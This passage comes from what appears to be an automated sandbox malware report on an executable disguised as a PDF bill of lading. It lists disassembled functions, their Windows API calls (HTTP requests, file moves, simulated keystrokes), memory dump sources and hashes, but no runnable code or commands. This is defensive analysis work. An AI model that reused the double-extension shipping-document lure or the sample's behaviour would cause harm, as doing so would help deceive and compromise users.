                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectRegistry_wcslen
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 535477410-2761332787
                                                                                                                      • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                      • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                      • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                      • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                                      Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0045F317
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                      • IsMenu.USER32(?), ref: 0045F380
                                                                                                                      • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID: 0$2
                                                                                                                      • API String ID: 3311875123-3793063076
                                                                                                                      • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                      • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                      • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                      • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                      Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe), ref: 0043719E
                                                                                                                      • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                      • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                      • _printf.LIBCMT ref: 004371EC
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, xrefs: 00437189
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_printf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe
                                                                                                                      • API String ID: 220974073-3888059103
                                                                                                                      • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                      • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                      • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                      • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                      Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                      • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                      • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                      • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                      Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,004A8E80,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,0040F3D2), ref: 0040FFCA
                                                                                                                        • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 978794511-0
                                                                                                                      • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                      • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                      • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                      • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                      Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                      • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                      • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                      • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                      Function 00455EF5 Relevance: 13.6, APIs: 9, Instructions: 126windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00455F01
                                                                                                                      • _memset.LIBCMT ref: 00455F12
                                                                                                                      • SendMessageW.USER32 ref: 00455F43
                                                                                                                      • SendMessageW.USER32(?,0000104B,00000000,?), ref: 00455F82
                                                                                                                      • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00455FF5
                                                                                                                      • _wcslen.LIBCMT ref: 00455FFC
                                                                                                                      • _wcslen.LIBCMT ref: 00456018
                                                                                                                      • CharNextW.USER32(00000000,?,?,?), ref: 00456034
                                                                                                                      • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00456060
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_wcslen$CharLongNextWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2321321212-0
                                                                                                                      • Opcode ID: 9fe44bf13dfe9639860e83451fa7f42e7831dc5b74bf465a4309150460e9ba2c
                                                                                                                      • Instruction ID: 728fd5b54b682decfcd50b06f9b7fb359c8698431e162ed45c662fcf507213b6
                                                                                                                      • Opcode Fuzzy Hash: 9fe44bf13dfe9639860e83451fa7f42e7831dc5b74bf465a4309150460e9ba2c
                                                                                                                      • Instruction Fuzzy Hash: 5D41D172204241ABE3108F68DC45BABB7E4FB84321F004A2EF954D72D1E7B9904A8B66
                                                                                                                      Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                        • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                        • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                      • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                      • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                      • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                      Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                      • String ID: AU3_FreeVar
                                                                                                                      • API String ID: 2184576858-771828931
                                                                                                                      • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                      • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                      • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                      • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                      Function 00401D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                      • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 4174999648-3243417748
                                                                                                                      • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                      • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                      • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                      • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                      Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                        • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1291720006-3916222277
                                                                                                                      • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                      • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                      • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                      • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                      Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastselect
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 215497628-2761332787
                                                                                                                      • Opcode ID: 0c289dde452dc5b8e8f80b5941646edeec8777aba5bf19acf69e203ec63bbfa9
                                                                                                                      • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                      • Opcode Fuzzy Hash: 0c289dde452dc5b8e8f80b5941646edeec8777aba5bf19acf69e203ec63bbfa9
                                                                                                                      • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                      Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                      • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                      • API String ID: 1729044348-3708979750
                                                                                                                      • Opcode ID: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                                      • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                                      • Opcode Fuzzy Hash: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                                      • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                                      Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,004A8E80,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,0040F3D2), ref: 0040FFCA
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                      • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                                      • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                                      • _wcslen.LIBCMT ref: 0044BCCB
                                                                                                                      • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2326526234-1173974218
                                                                                                                      • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                      • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                                      • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                      • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                                      Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
